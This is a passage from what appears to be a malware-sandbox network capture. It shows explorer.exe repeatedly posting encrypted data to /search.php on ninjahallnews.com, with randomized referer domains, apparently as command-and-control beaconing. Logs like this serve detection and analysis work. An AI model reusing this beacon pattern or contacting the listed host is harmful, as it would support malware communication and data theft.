                                                                                                                                      2024-10-08 01:15:25 UTC321OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6c 34 01 83 b7 25 93 3c 4e b5 73 96 d0 d7 3d 37 da 05 3f f5 24 f4 99 6e 67 f5 6e 08 49 94 d6 ec 6b cc c0 14 1f c3 88 26 b9 65 70 8f 87 06 1f 36 08 1c 01 fa 15 8d 94 a9 0a dc 82 77 31 0e f3 70 04 f7 4f 72 95 9e ac c6 3d 26 dc 02 fe 28 99 24 6b ce 23 98 6f 50 62 30 57 b8 e4 03 8e a6 78 fb 48 18 89 f2 d5 59 e2 b5 6f 98 9d 83 b7 49 58 97 a1 cf 07 4e 8f 1f 2f eb 72 09 58 83 71 2b 7e eb 42 03 29 c4 b3 c7 75 57 9b af 15 bb 74 ca e2 ff 26 20 2e 72 f3 18 29 50 36 65 ab 02 a8 a2 33 2c 30 72 3f 9a fd 60 40 3d 50 b0 d5 95 2e 94 ca 13 c6 58 aa a1 a2 df 7d a2 62
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[@Ll4%<Ns=7?$ngnIk&ep6w1pOr=&($k#oPb0WxHYoIXN/rXq+~B)uWt& .r)P6e3,0r?`@=P.X}b
                                                                                                                                      2024-10-08 01:15:26 UTC278INHTTP/1.1 200 OK
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:25 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      8192.168.2.44997123.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:15:26 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://onmervjnyngctx.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 335
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:15:26 UTC335OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6d 34 01 83 b7 25 93 3c 46 f8 71 a4 d9 c2 14 36 e5 6f 1b b7 75 f1 ce 61 3e de 7a 5d 43 a9 ee c0 55 eb ec 5b 6c dc ec 3f 9f 51 2a e8 9e 49 7d 32 61 28 5d f8 2b c9 db a8 58 f3 fe 51 24 4b b5 05 20 c1 22 68 c9 91 8a ad 41 65 d0 7b d3 49 b7 79 25 c8 4c a0 42 23 68 15 49 c8 f4 70 94 b5 0c 90 11 11 c6 cd 91 52 c0 e9 7f f4 cc aa 99 16 6f cd 80 83 6f 0a a6 6e 50 f0 6b 73 1c e8 6a 2a 32 fc 03 0c 46 d4 9c 89 7f 28 8f ee 63 90 20 cb ff f1 10 7d 71 59 b1 45 25 6e 0b 04 c5 33 86 91 10 33 64 71 2e e3 82 47 44 07 1f dc ee d2 31 87 df 13 fe 31 d7 b3 df a6 74 ad 43
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[@Lm4%<Fq6oua>z]CU[l?Q*I}2a(]+XQ$K "hAe{Iy%LB#hIpRoonPksj*2F(c }qYE%n33dq.GD11tC
                                                                                                                                      2024-10-08 01:15:27 UTC278INHTTP/1.1 200 OK
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:26 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      9192.168.2.44997723.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:15:27 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://gapeuqmkxloigpbr.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 232
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:15:27 UTC232OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 62 34 01 83 b7 25 93 3c 74 d8 15 ef 95 c9 5b 0e cb 08 72 b1 4f e2 d3 2e 28 e4 75 0b 77 a8 d5 8e 55 fa bb 50 41 f4 f5 49 ed 44 56 fb dc 6a 0e 56 40 14 05 ca 68 d1 82 85 58 ca ea 59 26 19 e0 6d 38 e9 21 59 ff cd e7 96 35 17 80 07 c2 41 b7 21 5d 92 0b 8e 70 4b 65 77 40 fe db 41 9e a6 14 ff 4b 03 9a d0 cb 28 d5 f8 0c 81 b6 ad dc 36 73 af de 95 6d 10 b4 1e 27 d9 68 12 1f ff 40 75 28 fb 29 33 47 e7 8d e1 62 68 8c a7 61 92 45 e6 d0 ff 6b 1f 0a 7a c6 73 7c 53 0b 25 f6 09 8f c4 24 56 63 16
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[@Lb4%<t[rO.(uwUPAIDVjV@hXY&m8!Y5A!]pKew@AK(6sm'h@u()3GbhaEkzs|S%$Vc
                                                                                                                                      2024-10-08 01:15:27 UTC278INHTTP/1.1 200 OK
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:27 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      10192.168.2.44998323.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:15:28 UTC286OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://toeqqmleovvia.net/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 352
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:15:28 UTC352OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 63 34 01 83 b7 25 93 3c 2e f8 67 9e a6 fb 41 51 be 72 12 f6 3f c4 ca 2f 29 a7 16 56 40 98 d6 89 70 f0 a6 70 69 c4 f0 27 92 71 36 e1 9a 05 16 4d 17 07 23 e0 3e bf f4 8c 48 f5 b8 6d 68 29 f1 10 0c fe 3b 7c f3 fe ad 81 5b 14 9a 1b b2 2a b8 36 5a ba 39 bd 4b 42 4b 2f 03 d2 dc 1a 93 a4 07 d7 26 08 f1 a2 81 1c b2 a6 5b f1 dd 85 90 40 28 9f 92 b2 0c 20 ca 70 5d 99 78 12 39 95 4f 35 2d c2 21 37 30 d5 a6 d7 6e 7f bf ab 78 9b 67 e7 be bd 25 76 10 78 ba 1b 6d 60 1a 22 e9 3e f3 85 28 1d 2c 2a 58 e0 e0 33 2b 22 33 ac d7 d3 20 ca b2 2b 9c 21 df e9 f3 cc 0d a9 2e
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[@Lc4%<.gAQr?/)V@ppi'q6M#>Hmh);|[*6Z9KBK/&[@( p]x9O5-!70nxg%vxm`">(,*X3+"3 +!.
                                                                                                                                      2024-10-08 01:15:28 UTC278INHTTP/1.1 200 OK
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:28 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      11192.168.2.44998923.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:15:29 UTC286OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://bqjkmpxvvpbja.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 345
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:15:29 UTC345OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 60 34 01 83 b7 25 93 3c 62 bd 02 94 a4 e5 51 2a c6 08 38 9c 5f 91 ea 74 60 a0 01 4e 75 bb cd ec 68 e0 c3 0c 59 82 a5 28 ee 21 76 b2 90 53 2d 7b 5e 21 21 f9 7c b5 d7 af 32 f9 91 3d 7d 06 83 1d 3b d2 3c 64 c6 c2 ba 9a 0f 3b b7 45 b5 5f e7 15 69 bf 5f 90 4a 2b 46 35 6b c9 af 62 ee bd 02 f7 40 26 d5 c1 be 43 f3 89 77 8f cf a7 b7 4a 4d 9f 8d cc 4d 5b 94 14 06 c9 1a 49 43 f3 73 12 2c f9 22 09 2f 84 8e f7 07 33 bc e6 00 9a 24 f1 f6 db 0c 31 3d 4e f1 64 26 5b 0b 2f bd 15 f3 ad 04 0d 28 67 29 81 e2 5e 66 41 28 a1 c1 cc 31 d5 ef 13 91 49 9e e1 e7 88 02 c8 62
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[@L`4%<bQ*8_t`NuhY(!vS-{^!!|2=};<d;E_i_J+F5kb@&CwJMM[ICs,"/3$1=Nd&[/(g)^fA(1Ib
                                                                                                                                      2024-10-08 01:15:29 UTC278INHTTP/1.1 200 OK
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:29 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      12192.168.2.44999523.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:15:30 UTC288OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://jesubehqcutadrf.net/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 358
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:15:30 UTC358OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 61 34 01 83 b7 25 93 3c 46 c4 20 e6 b8 c6 43 24 ba 07 32 b5 28 9f f4 3b 72 c4 34 3b 77 d4 ee d0 2b f0 c6 40 68 e7 ef 21 b0 6b 2a a2 dd 72 1b 7e 12 12 0e c7 1b d3 91 b8 55 90 9b 70 77 4e 9b 67 16 b9 2e 0d 94 c4 8b 81 20 10 9a 66 be 64 ba 76 28 b4 26 99 58 37 3a 25 14 bb b4 77 95 b1 76 d2 36 07 8c cb dc 1c a7 fa 01 e1 8c b7 82 21 4c 95 b9 bf 64 1a d6 0f 04 e8 2f 12 16 e3 3e 67 40 de 55 66 09 d8 90 e9 0a 51 8f a3 11 af 4e 9a af b2 06 3c 2a 6d f3 43 71 68 1f 6e cc 0f ef a1 06 4a 21 78 18 f0 89 5f 68 5e 40 bd f4 d9 22 9a d2 32 f7 3e 95 84 c5 86 02 9f 57
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[@La4%<F C$2(;r4;w+@h!k*r~UpwNg. fdv(&X7:%wv6!Ld/>g@UfQN<*mCqhnJ!x_h^@"2>W
                                                                                                                                      2024-10-08 01:15:30 UTC278INHTTP/1.1 200 OK
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:30 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      13192.168.2.45000123.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:15:31 UTC284OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://morbrftngjk.com/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 291
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:15:31 UTC291OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 66 34 01 83 b7 25 93 3c 4a a3 0a b0 c7 b5 14 31 d4 29 34 e1 74 ca c7 70 3e bf 68 5b 5a b0 dd d6 4f e4 e5 10 7c 8e f6 44 fe 3d 30 8b f1 1c 17 44 65 21 02 ff 03 a2 e8 8a 4a 9d e6 44 75 19 98 7b 18 ab 36 6f ec 90 be 82 0f 05 b7 50 cc 22 93 3d 57 cc 1d d7 40 39 56 65 68 ab f7 48 8c de 01 d1 30 78 ff c5 8c 1d ba 83 5b 8e a0 e7 a6 46 63 be 92 a3 43 20 bb 41 0c 9c 2e 4f 0d bc 29 72 74 ef 2e 31 08 ea 8b c6 07 3b c5 a5 1d bc 35 fb cd cf 67 7a 27 58 ac 68 11 5f 32 39 a3 51 e6 bd 04 29 69 42 2f c8 80 64 7a 43 04 8b 84 f1 19 c8 d4 63 d9 64 cd b6 af a8 52 d0 43
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[@Lf4%<J1)4tp>h[ZO|D=0De!JDu{6oP"=W@9VehH0x[FcC A.O)rt.1;5gz'Xh_29Q)iB/dzCcdRC
                                                                                                                                      2024-10-08 01:15:31 UTC278INHTTP/1.1 200 OK
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:31 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      14192.168.2.45000823.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:15:32 UTC284OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://shalkugnmyu.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 341
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:15:32 UTC341OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 67 34 01 83 b7 25 93 3c 49 c2 0f 92 b6 ab 46 35 de 1b 0c 90 2d f5 e3 7b 72 df 2f 56 20 cb a7 8e 3b a5 ae 57 0b f8 9a 63 9d 4a 5d 8f e1 7c 2e 48 4f 3b 31 e4 2e c8 d1 ce 32 fa fa 2e 27 32 e6 43 22 e0 54 7f 88 e7 9b bf 04 6c a3 70 d2 6a f1 66 65 b9 13 d1 31 7f 41 3c 11 cb af 6d ec 91 38 df 36 71 d7 cc c8 3d a5 99 79 80 9a 95 cc 0c 55 90 b1 b2 4c 46 af 4e 36 f3 62 4b 2d bf 23 75 63 d3 34 72 4a ef 91 83 6d 35 c4 e1 0a ea 63 f2 f0 d5 07 31 15 3e f3 03 73 4f 06 7f d8 51 9e a4 0c 48 79 37 07 88 b3 73 5e 01 2d 8f cb 9d 1c 9f f9 6c d7 29 d0 b5 ed 86 12 b7 5c
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[@Lg4%<IF5-{r/V ;WcJ]|.HO;1.2.'2C"Tlpjfe1A<m86q=yULFN6bK-#uc4rJm5c1>sOQHy7s^-l)\
                                                                                                                                      2024-10-08 01:15:32 UTC278INHTTP/1.1 200 OK
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:32 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      15192.168.2.45001523.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:15:33 UTC288OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://ubaoujicoyurcry.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 287
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:15:33 UTC287OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 64 34 01 83 b7 25 93 3c 4d d1 17 a0 cb de 32 00 dd 33 03 b3 58 85 f6 2f 22 e1 05 3d 27 c7 c5 8e 76 a4 aa 7d 6a f0 89 35 b6 42 29 ad 86 79 0f 2f 7a 44 18 87 7a cc e3 a8 46 8e a9 3d 26 45 8f 16 5c e6 2a 55 97 88 ee 9b 49 6b 99 61 ae 2d bf 74 20 d3 2c ae 2e 54 65 77 56 c1 de 44 82 ce 02 fa 15 22 98 c8 c5 13 d8 9b 71 9f b2 9f a0 03 4e a4 a5 bb 42 5c a2 56 1c fd 06 76 2a e0 4e 6a 2d bb 2c 1d 1d c0 c3 9f 7b 7a c7 dd 3a 96 47 c9 c1 c3 32 3b 72 5a a1 79 3f 6e 37 75 ea 0b fc 80 09 40 22 5b 5b 88 f0 51 51 38 4f b7 d4 ca 47 f9 f4 71 e7 40 8a 9e e0 b9 0d bc 22
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[@Ld4%<M23X/"='v}j5B)y/zDzF=&E\*UIka-t ,.TewVD"qNB\Vv*Nj-,{z:G2;rZy?n7u@"[[QQ8OGq@"
                                                                                                                                      2024-10-08 01:15:33 UTC278INHTTP/1.1 200 OK
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:33 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      16192.168.2.45002423.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:15:33 UTC288OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://oriixfynfaeoogt.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 211
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:15:33 UTC211OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 65 34 01 83 b7 25 93 3c 7f b5 1a 9a bf f6 44 07 f0 6f 3b ac 26 eb e9 20 1b c0 1f 0a 58 c1 c5 e9 2b cc e7 4d 01 ff fc 79 95 74 32 f1 d4 66 70 5c 58 16 51 98 38 ba 82 89 02 d3 b0 4c 6a 24 b5 78 0b d0 2d 51 e3 c1 ab 95 5a 0d c0 1a c6 7f 8d 0b 58 ad 45 8a 6f 77 24 34 07 f7 cc 40 8f 94 79 ee 5d 3f 81 c0 8e 2e fa 83 57 b8 aa a7 a8 22 2c da d5 a5 04 15 9b 11 26 c2 3c 41 1c a6 4b 0a 2e b7 20 29 19 ff a4 80 7f 22 89 b9 2a ea 17
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[@Le4%<Do;& X+Myt2fp\XQ8Lj$x-QZXEow$4@y]?.W",&<AK. )"*
                                                                                                                                      2024-10-08 01:15:34 UTC278INHTTP/1.1 200 OK
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:34 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Length: 0
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      17192.168.2.45003023.145.40.1684432580C:\Windows\explorer.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-10-08 01:15:34 UTC285OUTPOST /search.php HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Accept: */*
                                                                                                                                      Referer: https://hqstyqadnnvm.org/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Content-Length: 333
                                                                                                                                      Host: ninjahallnews.com
                                                                                                                                      2024-10-08 01:15:34 UTC333OUTData Raw: 72 19 83 cf 8b 06 16 8e 6d 81 e8 68 39 f0 18 2f d1 f2 b9 a2 17 0a 32 f3 70 07 c7 95 ea d5 36 ef 0f 9c b9 84 06 fd db 86 f3 0f d0 cf e9 20 29 a1 c5 c1 36 49 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 7a 34 01 83 b7 25 93 3c 57 fe 16 fd ba eb 11 28 dc 1e 6c e4 55 f8 90 01 06 cd 0a 28 3d c7 da fe 48 cb ee 11 4f 9d 82 7c e4 51 51 f2 d4 70 7f 23 4b 42 21 c6 2d db da c0 03 e9 e4 40 00 2f 96 02 5a f2 51 46 84 e5 e9 c3 07 04 cb 0d db 6f af 73 26 bc 51 ce 26 5d 4b 1e 1d f9 d2 11 81 9d 7e e1 1a 3c 85 c3 cd 48 e3 ee 7b ec de fa de 18 5d 8f 82 96 6d 51 af 6e 38 98 32 4c 15 b0 41 78 63 b8 46 7f 5e 86 bb d5 67 23 cb e0 7b 95 5c c1 b6 f5 00 66 00 2e c9 6c 1d 7c 2a 0e a7 56 b8 a4 69 28 6b 59 54 8b 80 57 40 22 51 92 91 96 2b e7 ad 2d ce 27 a9 ab d7 b3 44 87 57
                                                                                                                                      Data Ascii: rmh9/2p6 )6IP g3iqH[@Lz4%<W(lU(=HO|QQp#KB!-@/ZQFos&Q&]K~<H{]mQn82LAxcF^g#{\f.l|*Vi(kYTW@"Q+-'DW
                                                                                                                                      2024-10-08 01:15:35 UTC294INHTTP/1.1 404 Not Found
                                                                                                                                      Date: Tue, 08 Oct 2024 01:15:35 GMT
                                                                                                                                      Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Connection: close
                                                                                                                                      Transfer-Encoding: chunked
